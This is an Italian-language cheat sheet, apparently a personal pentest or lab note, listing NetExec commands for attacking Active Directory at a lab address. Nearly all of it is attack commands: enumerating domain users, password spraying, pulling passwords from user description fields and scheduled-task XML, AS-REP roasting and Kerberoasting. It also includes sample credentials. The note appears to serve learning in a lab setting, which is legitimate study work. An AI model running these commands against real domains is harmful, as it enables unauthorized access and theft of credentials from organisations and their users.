tags: Active_Directory_Enumerazione_Utenti Active_Directory_Enumerazione
Enumerare utenti con possesso di credenziali
Se sei riuscito a recuperare delle credenziali valide puoi utilizzare il seguente comando per enumerare tutti gli utenti in Active Directory:
nxc ldap 10.129.15.49 -u 'Simone' -p 'Passwod' --users | awk '{print $5}' | tail -n +5 > users.txtPassword Spraying Attack
nxc smb 10.129.15.49 -u users.txt -p 'Passwod' --continue-on-successControlla le “Descrizioni” degli utenti
Molti amministratori scrivono password temporanee nel campo “Description” dell’utente. NXC può leggerle tutte in un colpo solo:
nxc ldap 10.129.15.49 -u 'ldapreader' -p 'ppYaVcB5R' -M user-descCerca in altri file XML (Scheduled Tasks)
Il comando gpp_password che hai usato prima cerca solo nel file Groups.xml. Ma le password possono essere anche nei Task Schedulati. Prova questo modulo di NXC:
nxc smb 10.129.15.49 -u 'ldapreader' -p 'ppYaVcB5R' -M schtask_asAS-REP Roasting
nxc ldap <IP> -u users.txt -p '' --asreproast output.txtKerberoasting
nxc ldap <IP> -u 'user' -p 'pass' --kerberoasting hashes.txt